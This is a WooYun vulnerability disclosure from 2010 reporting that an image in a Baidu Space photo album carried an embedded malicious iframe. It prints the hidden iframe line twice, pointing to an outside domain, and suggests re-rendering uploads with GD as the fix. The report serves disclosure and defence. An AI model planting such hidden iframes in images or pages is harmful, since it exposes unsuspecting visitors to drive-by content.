当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0716

漏洞标题:百度空间上传图片中包含恶意代码

相关厂商:百度

漏洞作者: 路人甲

提交时间:2010-10-20 12:01

修复时间:2010-11-19 15:00

公开时间:2010-11-19 15:00

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-10-20: 细节已通知厂商并且等待厂商处理中
2010-10-20: 厂商已经确认,细节仅向厂商公开
2010-10-30: 细节向核心白帽子及相关领域专家公开
2010-11-09: 细节向普通白帽子公开
2010-11-19: 细节向实习白帽子公开
2010-11-19: 细节向公众公开

简要描述:

百度空间某相册中,上传的图片中,图片被加入恶意代码,某些浏览器解析图片时候,可能会把恶意代码解析,对客户端产生威胁。

详细说明:

图片位置:http://hiphotos.baidu.com/ruyanshihe/pic/item/a0119cecc26a407179f0555c.jpg
被加入代码:
<iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>
chrome浏览时,在图片正常解析的情况下,代码虽然未被执行,但杀毒软件报告了。IE6下估计会被解析。未测试。当浏览者是小白的时候,这种提示,会让小白害怕,对百度的“名声”产生影响。

漏洞证明:

<iframe src="http://w.mh8888.cn/ad.htm?a" width="100" height="0"></iframe>


修复方案:

前段时间,80sec爆了nginx webserver下php.ini参数不当,导致nginx解析漏洞。但这件归根结底是隐患出现在哪里?php参数配置不当?我觉得不是。我觉得问题的主要原因是上传的“图片”不合格,假如包含恶意代码的文件根本不会被保存到服务器上,那么这种问题就不会发生。个人认为,对上传的文件(图片)严格控制,最好用GD重绘图片,使得伪装成正常图片,且包含恶意代码的文件,不包含恶意代码,成为正常的图片。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2010-10-20 15:09

厂商回复:

感谢提交

最新状态:

暂无